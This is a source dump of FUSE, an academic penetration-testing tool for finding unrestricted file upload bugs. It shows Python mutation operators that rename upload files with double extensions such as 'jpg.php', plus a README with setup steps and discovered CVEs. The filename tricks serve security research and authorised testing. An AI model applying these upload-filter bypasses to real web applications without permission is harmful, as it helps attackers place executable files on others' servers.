 7 |   __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M07', 'M10', 'M11', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP', 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M07', 'M08', 'M10', 'M11','M12_BZ2','M12_GIF','M12_PDF','M12_PNG','M12_TAR_GZ','M12_TXT','M12_JPG','M12_XHT','M12_ZIP'], 'xhtml':[ 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M07', 'M08', 'M10', 'M11','M12_BZ2','M12_GIF','M12_JPG','M12_PNG','M12_TAR_GZ','M12_TXT','M12_ZIP','M12_PDF'], 'js':['M12_HTML','M12_XHTML','M10', 'M11','M12_GIF','M12_JPG','M12_PNG']}#['M01_GIF','M01_JPG', 'M01_PNG', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_OTHER','M08'] # ([classname])when this op used for mutation,
 8 | 
 9 |                         # operations in this list can be used to extra mutation.
10 |   __resource__ = {} # ({type:resource filename})
11 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js"] # seed file dependency for operation
12 | 
13 |   def operation(self, output, seed_file, resource_file=None):
14 |       if output['filename'] != None and len(output['filename']) > 0:
15 |         filename = output['filename']
16 |       else:
17 |         filename = utils.extract_filename(seed_file)
18 |       #change = lambda a : chr(ord(a)+1)
19 |       output['filename'] = filename + '_M10'
20 |       #output['fileext'] = ''.join(map(change,list(output['fileext'])))
21 |       output['fileext'] = 'fuse'
22 | 


--------------------------------------------------------------------------------
/mutation_op/m12_jpg.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#[          'M12_GIF','M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT']# ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12JPG'
19 | 
20 |       output['fileext'] = 'jpg.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m12_pdf.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#['M12_JPG','M12_GIF','M12_TXT','M12_PNG',          'M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT']# ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12PDF'
19 | 
20 |       output['fileext'] = 'pdf.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m12_png.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#['M12_JPG','M12_GIF','M12_TXT',          'M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12PNG'
19 | 
20 |       output['fileext'] = 'png.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m12_tar_gz.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M04_BZ2', 'M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M04_BZ2', 'M04_GIF', 'M04_JPG', 'M04_PNG', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M08', 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}# ['M12_JPG','M12_GIF','M12_TXT','M12_PNG','M12_PDF','M12_ZIP'             , 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT']  # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12TARGZ'
19 | 
20 |       output['fileext'] = 'tar.gz.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # FUSE
  2 | 
  3 | FUSE is a penetration testing system designed to identify Unrestricted
  4 | Executable File Upload (UEFU) vulnerabilities. The details of the testing
  5 | strategy is in our
  6 | [paper](https://wsp-lab.github.io/papers/lee-fuse-ndss20.pdf),
  7 | "FUSE: Finding File Upload Bugs via Penetration Testing", which appeared in
  8 | NDSS 2020. To see how to configure and execute FUSE, see the followings.
  9 | 
 10 | # Setup
 11 | ## Install
 12 | 
 13 | FUSE currently works on Ubuntu 18.04 and Python 2.7.15.
 14 | 
 15 | 1. Install dependencies
 16 | ```
 17 | # apt-get install rabbitmq-server
 18 | # apt-get install python-pip
 19 | # apt-get install git
 20 | ```
 21 | 
 22 | 2. Clone and build FUSE
 23 | ```
 24 | $ git clone https://github.com/WSP-LAB/FUSE
 25 | $ cd FUSE && pip install -r requirements.txt
 26 | ```
 27 | 
 28 | * If you plan to leverage headless browser verification using selenium, please
 29 | install Chrome and Firefox web driver by refering [selenium
 30 | document](https://selenium.dev/selenium/docs/api/py/index.html).
 31 | 
 32 | ## Usage
 33 | ### Configuration
 34 | 
 35 | * FUSE uses a user-provided [configuration file](configs/default-credential.conf)
 36 | that specifies parameters for a target PHP application. The script must be
 37 | filled out before testing a target Web application. You can check out
 38 | [README](configs/README.md) file and [example configuration files](configs).
 39 | 
 40 | 
 41 | * Configuration for File Monitor (Optional)
 42 | ```
 43 | $ vim filemonitor.py
 44 | 
 45 | ...
 46 |  10 MONITOR_PATH='/var/www/html/' <- Web root of the target application
 47 |  11 MONITOR_PORT=20174            <- Default port of File Monitor
 48 |  12 EVENT_LIST_LIMITATION=8000    <- Maxium number of elements in EVENT_LIST
 49 | ...
 50 | ```
 51 | 
 52 | 
 53 | ### Execution
 54 | 
 55 | * FUSE
 56 | 
 57 | ```
 58 | $ python framework.py [Path of configuration file]
 59 | ```
 60 | 
 61 | * File Monitor
 62 | 
 63 | ```
 64 | $ python filemonitor.py
 65 | ```
 66 | 
 67 | * Result
 68 |   * When FUSE completes the penetration testing, a [HOST] directory and a [HOST_report.txt] file are created.
 69 |   * A [HOST] folder stores files that have been attempted to upload.
 70 |   * A [HOST_report.txt] file contains test results and information related to files that trigger U(E)FU.
 71 | 
 72 | # CVEs
 73 | If you find UFU and UEFU bugs and get CVEs by running FUSE, please send a PR for [README.md](README.md)
 74 | 
 75 | Application | CVEs
 76 | ------------| ----
 77 | Elgg | CVE-2018-19172
 78 | ECCube3 | CVE-2018-18637
 79 | CMSMadeSimple | CVE-2018-19419, CVE-2018-18574
 80 | CMSimple | CVE-2018-19062
 81 | Concrete5 | CVE-2018-19146
 82 | GetSimpleCMS | CVE-2018-19420, CVE-2018-19421
 83 | Subrion | CVE-2018-19422
 84 | OsCommerce2 | CVE-2018-18572, CVE-2018-18964, CVE-2018-18965, CVE-2018-18966
 85 | Monstra | CVE-2018-6383, CVE-2018-18694
 86 | XE | XEVE-2019-001
 87 | 
 88 | 
 89 | # Author
 90 | This research project has been conducted by [WSP Lab](https://wsp-lab.github.io) at KAIST.
 91 | 
 92 | * Taekjin Lee
 93 | * [Seongil Wi](https://seongil-wi.github.io/)
 94 | * [Suyoung Lee](https://leeswimming.com/)
 95 | * [Sooel Son](https://sites.google.com/site/ssonkaist/home)
 96 | 
 97 | # Citing FUSE
 98 | To cite our paper:
 99 | ```
100 | @INPROCEEDINGS{lee:ndss:2020,
101 |     author = {Taekjin Lee and Seongil Wi and Suyoung Lee and Sooel Son},
102 |     title = {{FUSE}: Finding File Upload Bugs via Penetration Testing},
103 |     booktitle = {Proceedings of the Network and Distributed System Security Symposium},
104 |     year = 2020
105 | }
106 | ```
107 | 
108 | 
109 | 


--------------------------------------------------------------------------------
/mutation_op/m12_gif.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
